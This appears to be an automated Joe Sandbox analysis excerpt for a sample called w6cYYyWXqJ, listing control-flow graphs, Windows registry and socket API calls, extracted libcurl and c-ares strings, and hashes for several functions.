1117 f4a04a-f4a04c 1086->1117 1094 f49eb3-f49ec4 call f3e9c0 1087->1094 1090->1063 1119 f49d3e-f49d42 1090->1119 1112 f49d71-f49d73 1091->1112 1113 f49dc2 1091->1113 1094->954 1126 f49eca-f49ed0 1094->1126 1105 f49e06-f49e21 call f3e9f0 call f3e4a0 1096->1105 1102 f49e3d-f49e5b call f3ebf0 * 2 1097->1102 1103 f49e38-f49e3b 1097->1103 1114 f49e5e-f49e67 1102->1114 1103->1102 1103->1114 1141 f49de1-f49dee call f3ec80 1105->1141 1142 f49e23-f49e2c call f3eac0 1105->1142 1106->1028 1128 f49c35 1109->1128 1129 f49c66-f49c75 call f478a0 1109->1129 1124 f49d9a-f49db5 call f3e9f0 call f3e4a0 1112->1124 1113->1075 1114->1062 1114->1094 1116->1094 1122 f4a057-f4a070 call f3ebf0 * 2 1117->1122 1123 f4a04e-f4a051 1117->1123 1119->1062 1122->1008 1123->967 1123->1122 1157 f49d75-f49d82 call f3ec80 1124->1157 1158 f49db7-f49dc0 call f3eac0 1124->1158 1133 f49ee5-f49ef2 call f3e9f0 1126->1133 1135 f49c37-f49c51 call f3e9f0 1128->1135 1154 f4a011 1129->1154 1155 f49c7b-f49c8f call f3e7c0 1129->1155 1133->954 1151 f49ef8-f49f0e call f3e440 1133->1151 1135->1012 1172 f49c57-f49c64 call f3e9d0 1135->1172 1166 f49df1-f49e04 call f3e960 1141->1166 1142->1166 1173 f49f10-f49f26 call f3e3c0 1151->1173 1174 f49ed2-f49edf call f3e9e0 1151->1174 1154->1016 1155->1012 1169 f49c95-f4a00e 1155->1169 1178 f49d85-f49d98 call f3e960 1157->1178 1158->1178 1166->1097 1166->1105 1169->1154 1172->1129 1172->1135 1173->1174 1188 f49f28 1173->1188 1174->954 1174->1133 1178->1113 1178->1124 1188->967
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F49946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00F49974
                                  • RegCloseKey.KERNELBASE(?), ref: 00F4998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                  • API String ID: 3677997916-4129964100
                                  • Opcode ID: 329bd8e976220775dc93b944d907aeeb514963f6d649e0e1ba7fd62a5d4e279d
                                  • Instruction ID: 710c1f0b47bc962a80450d8f134d7c516e1432c4ce83e1460f554f9e94d2b067
                                  • Opcode Fuzzy Hash: 329bd8e976220775dc93b944d907aeeb514963f6d649e0e1ba7fd62a5d4e279d
                                  • Instruction Fuzzy Hash: E23284B5E08201ABEB11AB24EC42B1B7AE4AF54328F084434FD4996253F775ED19F793
                                  Function 00EB8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1364 eb8b50-eb8b69 1365 eb8b6b-eb8b74 1364->1365 1366 eb8be6 1364->1366 1368 eb8beb-eb8bf2 1365->1368 1369 eb8b76-eb8b8d 1365->1369 1367 eb8be9 1366->1367 1367->1368 1370 eb8b8f-eb8ba7 call e96e40 1369->1370 1371 eb8bf3-eb8bfe call eba550 1369->1371 1378 eb8cd9-eb8d16 SleepEx 1370->1378 1379 eb8bad-eb8baf 1370->1379 1376 eb8de4-eb8def 1371->1376 1377 eb8c04-eb8c08 1371->1377 1384 eb8e8c-eb8e95 1376->1384 1385 eb8df5-eb8e19 call eba150 1376->1385 1382 eb8c0e-eb8c1d 1377->1382 1383 eb8dbd-eb8dc3 1377->1383 1398 eb8d18-eb8d20 1378->1398 1399 eb8d22 1378->1399 1380 eb8ca6-eb8cb0 1379->1380 1381 eb8bb5-eb8bb9 1379->1381 1380->1378 1393 eb8cb2-eb8cb8 1380->1393 1381->1368 1387 eb8bbb-eb8bc2 1381->1387 1391 eb8c1f-eb8c30 connect 1382->1391 1392 eb8c35-eb8c48 call eba150 1382->1392 1383->1367 1389 eb8f00-eb8f06 1384->1389 1390 eb8e97-eb8e9c 1384->1390 1420 eb8e1b-eb8e26 1385->1420 1421 eb8e88 1385->1421 1387->1368 1397 eb8bc4-eb8bcc 1387->1397 1389->1368 1400 eb8edf-eb8eef call e878b0 1390->1400 1401 eb8e9e-eb8eb6 call e92a00 1390->1401 1391->1392 1419 eb8c4d-eb8c4f 1392->1419 1394 eb8cbe-eb8cd4 call ebb180 1393->1394 1395 eb8ddc-eb8dde 1393->1395 1394->1376 1395->1367 1395->1376 1404 eb8bce-eb8bd2 1397->1404 1405 eb8bd4-eb8bda 1397->1405 1407 eb8d26-eb8d39 1398->1407 1399->1407 1423 eb8ef2-eb8efc 1400->1423 1401->1400 1418 eb8eb8-eb8edd call e93410 * 2 1401->1418 1404->1368 1404->1405 1405->1368 1413 eb8bdc-eb8be1 1405->1413 1416 eb8d3b-eb8d3d 1407->1416 1417 eb8d43-eb8d61 call e9d8c0 call eba150 1407->1417 1422 eb8dac-eb8db8 call ec50a0 1413->1422 1416->1395 1416->1417 1439 eb8d66-eb8d74 1417->1439 1418->1423 1426 eb8c8e-eb8c93 1419->1426 1427 eb8c51-eb8c58 1419->1427 1428 eb8e28-eb8e2c 1420->1428 1429 eb8e2e-eb8e85 call e9d090 call ec4fd0 1420->1429 1421->1384 1422->1368 1423->1389 1436 eb8c99-eb8c9f 1426->1436 1437 eb8dc8-eb8dd9 call ebb100 1426->1437 1427->1426 1433 eb8c5a-eb8c62 1427->1433 1428->1421 1428->1429 1429->1421 1440 eb8c6a-eb8c70 1433->1440 1441 eb8c64-eb8c68 1433->1441 1436->1380 1437->1395 1439->1368 1444 eb8d7a-eb8d81 1439->1444 1440->1426 1446 eb8c72-eb8c8b call ec50a0 1440->1446 1441->1426 1441->1440 1444->1368 1449 eb8d87-eb8d8f 1444->1449 1446->1426 1453 eb8d9b-eb8da1 1449->1453 1454 eb8d91-eb8d95 1449->1454 1453->1368 1457 eb8da7 1453->1457 1454->1368 1454->1453 1457->1422
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00EB8C30
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00EB8CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: ab6cfb0dc5fb462e15a86d13b48fbaddd5d8f8dd8f45eb825fbb89baf28712e1
                                  • Instruction ID: 7e866999a6fbc1632e2455015f4e75447b1075c65b4513348de9f54170e882dc
                                  • Opcode Fuzzy Hash: ab6cfb0dc5fb462e15a86d13b48fbaddd5d8f8dd8f45eb825fbb89baf28712e1
                                  • Instruction Fuzzy Hash: DBB1A174604306AFDB10CF24CA85BE7BBE8AF45318F149A2DE8596B3D2DB71E844C751
                                  Function 00E82F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1458 e82f17-e82f8c call 13098f0 call 1309ce0 1463 e831c9-e831cd 1458->1463 1464 e82f91-e82ff4 call e81619 RegOpenKeyExA 1463->1464 1465 e831d3-e831d6 1463->1465 1468 e82ffa-e8300b 1464->1468 1469 e831c5 1464->1469 1470 e8315c-e831ac RegEnumKeyExA 1468->1470 1469->1463 1471 e83010-e83083 call e81619 RegOpenKeyExA 1470->1471 1472 e831b2-e831c2 1470->1472 1476 e83089-e830d4 RegQueryValueExA 1471->1476 1477 e8314e-e83152 1471->1477 1472->1469 1478 e8313b-e8314b RegCloseKey 1476->1478 1479 e830d6-e83137 call 1309bc0 call 1309c50 call 1309ce0 call 1309af0 call 1309ce0 call 1308050 1476->1479 1477->1470 1478->1477 1479->1478
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: EnumOpen
                                  • String ID: d
                                  • API String ID: 3231578192-2564639436
                                  • Opcode ID: f9723dc87772ed69be578622acdd8437a7004e8fdf06ee348bef52d6ee9dd7e6
                                  • Instruction ID: ded81d6cd23a6b134b0d5a14ec42bebb76e77a4fdfdb8e455ef4bacc4c3151e6
                                  • Opcode Fuzzy Hash: f9723dc87772ed69be578622acdd8437a7004e8fdf06ee348bef52d6ee9dd7e6
                                  • Instruction Fuzzy Hash: 807183B49043199FDB10EF69C58479EBBF0BF84308F10895DE998A7341D7749A88CF92
                                  Function 00E876A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1492 e876a0-e876be 1493 e876c0-e876c7 1492->1493 1494 e876e6-e876f2 send 1492->1494 1493->1494 1495 e876c9-e876d1 1493->1495 1496 e8775e-e87762 1494->1496 1497 e876f4-e87709 call e872a0 1494->1497 1498 e8770b-e87759 call e872a0 call e8cb20 call 1208c50 1495->1498 1499 e876d3-e876e4 1495->1499 1497->1496 1498->1496 1499->1497
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,N=,00000000,?,?,00E907BF), ref: 00E876EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$N=$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-2907172669
                                  • Opcode ID: 6b150468fc21836c5cfe14c1ea7b19a33767252c174341098cd93d25cd40050b
                                  • Instruction ID: 43f4c7a92fa39008bfadb92682f629987ce19c52ab69bbe88e38f65e4572f6cf
                                  • Opcode Fuzzy Hash: 6b150468fc21836c5cfe14c1ea7b19a33767252c174341098cd93d25cd40050b
                                  • Instruction Fuzzy Hash: DB1127B66483047BD220AB15AC86D277B9CDF82B6CF25190DFD5C36351E261DC0083B2
                                  Function 00EB9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1611 eb9290-eb92ed call e876a0 1614 eb93c3-eb93ce 1611->1614 1615 eb92f3-eb92fb 1611->1615 1624 eb93d0-eb93e1 1614->1624 1625 eb93e5-eb9427 call e9d090 call ec4f40 1614->1625 1616 eb93aa-eb93af 1615->1616 1617 eb9301-eb9333 call e9d8c0 call e9d9a0 1615->1617 1618 eb9456-eb9470 1616->1618 1619 eb93b5-eb93bc 1616->1619 1635 eb93a7 1617->1635 1636 eb9335-eb9364 WSAIoctl 1617->1636 1622 eb9429-eb9431 1619->1622 1623 eb93be 1619->1623 1629 eb9439-eb943f 1622->1629 1630 eb9433-eb9437 1622->1630 1623->1618 1624->1619 1631 eb93e3 1624->1631 1625->1618 1625->1622 1629->1618 1634 eb9441-eb9453 call ec50a0 1629->1634 1630->1618 1630->1629 1631->1618 1634->1618 1635->1616 1639 eb939b-eb93a4 1636->1639 1640 eb9366-eb936f 1636->1640 1639->1635 1640->1639 1643 eb9371-eb9390 setsockopt 1640->1643 1643->1639 1644 eb9392-eb9395 1643->1644 1644->1639
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00EB935C
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00EB9389
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: b32c6658376067d5ea90ca716452af63abbce1113c39a019771a1b762fbbd86d
                                  • Instruction ID: 6de042fe52a18fe1126cef2147a0cdab8f9a842e9513a99794f6a82f9a312166
                                  • Opcode Fuzzy Hash: b32c6658376067d5ea90ca716452af63abbce1113c39a019771a1b762fbbd86d
                                  • Instruction Fuzzy Hash: 30510370A04305ABD715DF24C881FEAB7A5FF84318F149529FE58AB293E730E951CB91
                                  Function 0120D1D0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1645 120d1d0-120d281 call 1208d18 1648 120d3b7-120d3c1 1645->1648 1649 120d287-120d28e 1645->1649 1650 120d2da-120d2dd 1649->1650 1651 120d290-120d2a1 1650->1651 1652 120d2df-120d305 1650->1652 1653 120d2a3-120d2aa 1651->1653 1654 120d2ac-120d2b6 1651->1654 1655 120d3b0 1652->1655 1656 120d30b-120d324 1652->1656 1653->1654 1657 120d2bf-120d2c2 1653->1657 1658 120d340-120d347 call 1208c68 1654->1658 1659 120d2bc 1654->1659 1655->1648 1660 120d326-120d332 1656->1660 1662 120d2c9-120d2d4 1657->1662 1678 120d34c 1658->1678 1659->1657 1663 120d334-120d337 1660->1663 1664 120d358-120d35d 1660->1664 1662->1650 1662->1655 1663->1658 1663->1664 1665 120d620-120d62a 1663->1665 1666 120d700-120d735 call 120b6a0 1663->1666 1667 120d602-120d604 1663->1667 1668 120d4e4-120d4f7 call 120b640 1663->1668 1669 120d4c6-120d4c8 1663->1669 1670 120d6a6-120d6af 1663->1670 1671 120d5e9-120d5ec 1663->1671 1672 120d4ab-120d4ad 1663->1672 1673 120d5cb-120d5cd 1663->1673 1674 120d5ad-120d5af 1663->1674 1675 120d570-120d576 1663->1675 1676 120d6d3-120d6dc 1663->1676 1677 120d4fc-120d4fe 1663->1677 1679 120d363-120d366 1664->1679 1680 120daeb-120db00 call 120b640 1664->1680 1689 120d630-120d643 1665->1689 1690 120d8d2-120d8e7 1665->1690 1666->1662 1687 120dad1-120dad4 1667->1687 1688 120d60a-120d61b 1667->1688 1668->1662 1681 120d3a0-120d3a4 1669->1681 1693 120d4ce-120d4df 1669->1693 1694 120d6b5-120d6ce call 120c9c0 1670->1694 1695 120da4c-120da65 call 120c9c0 1670->1695 1684 120d5f2-120d5fd 1671->1684 1685 120dbbc-120dbdd 1671->1685 1672->1681 1692 120d4b3-120d4c1 1672->1692 1673->1681 1683 120d5d3-120d5e4 1673->1683 1674->1681 1682 120d5b5-120d5c6 1674->1682 1675->1684 1701 120d578-120d57e 1675->1701 1697 120d6e2-120d6fb call 120ca50 1676->1697 1698 120d9de-120d9ee call 120ca50 1676->1698 1677->1681 1699 120d504-120d54f localeconv call 12178b0 1677->1699 1678->1657 1679->1680 1686 120d36c-120d36e 1679->1686 1680->1662 1702 120d3a6-120d3a8 1681->1702 1682->1702 1683->1702 1684->1702 1685->1702 1704 120d374-120d37f 1686->1704 1705 120dadb-120dae6 1686->1705 1687->1680 1709 120dad6 1687->1709 1688->1702 1707 120d649-120d657 1689->1707 1708 120db9c-120db9e 1689->1708 1716 120dba0-120dba2 1690->1716 1717 120d8ed-120d8fd 1690->1717 1692->1702 1693->1702 1694->1662 1695->1662 1697->1662 1720 120d9f3-120d9f7 1698->1720 1740 120d551-120d556 1699->1740 1741 120d55e-120d56b 1699->1741 1718 120d584-120d592 1701->1718 1719 120db05-120db18 1701->1719 1702->1660 1725 120d3ae 1702->1725 1704->1681 1721 120d381-120d389 1704->1721 1723 120d663-120d670 1707->1723 1724 120d659-120d65c 1707->1724 1728 120dba4-120dbb7 call 120b9d0 1708->1728 1709->1705 1716->1728 1730 120d909-120d918 1717->1730 1731 120d8ff-120d902 1717->1731 1732 120dcd8-120dcda 1718->1732 1733 120d598-120d5a8 1718->1733 1719->1702 1720->1662 1736 120db8c-120db97 1721->1736 1737 120d38f-120d39c 1721->1737 1738 120d676-120d687 1723->1738 1739 120dcb9-120dcd3 call 120b9d0 1723->1739 1724->1723 1725->1655 1743 120dc9a-120dcb4 call 120b9d0 1730->1743 1744 120d91e-120d92f 1730->1744 1731->1730 1734 120dcf3-120dd13 1732->1734 1735 120dcdc-120dce7 1732->1735 1733->1702 1734->1702 1735->1734 1736->1702 1737->1681 1749 120db1d-120db26 1738->1749 1750 120d68d-120d6a1 call 120cc90 1738->1750 1739->1720 1740->1741 1741->1702 1743->1739 1746 120dc81-120dc8a 1744->1746 1747 120d935-120d93a 1744->1747 1746->1743 1753 120d940-120d97a call 120cc90 1747->1753 1754 120db5c-120db5f 1747->1754 1749->1754 1750->1720 1753->1720 1754->1746 1759 120db65 1754->1759 1759->1736
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$Inf$NaN
                                  • API String ID: 0-141429178
                                  • Opcode ID: 8f85685f63489075c252897024c47628f7dd3c21a25cbc47d9f71b10904d8725
                                  • Instruction ID: bec3a5497fbae7c3b223a987a90bef2701039896e7bbd79d15ee8a69ee2da7ee
                                  • Opcode Fuzzy Hash: 8f85685f63489075c252897024c47628f7dd3c21a25cbc47d9f71b10904d8725
                                  • Instruction Fuzzy Hash: 95F1B17062D38A8BD7229FA8C4407ABBBE1BB85314F048B1DDADD872C3D77599458B42
                                  Function 00E87770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1761 e87770-e8778e 1762 e87790-e87797 1761->1762 1763 e877b6-e877c2 recv 1761->1763 1762->1763 1766 e87799-e877a1 1762->1766 1764 e8782e-e87832 1763->1764 1765 e877c4-e877d9 call e872a0 1763->1765 1765->1764 1767 e877db-e87829 call e872a0 call e8cb20 call 1208c50 1766->1767 1768 e877a3-e877b4 1766->1768 1767->1764 1768->1765
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
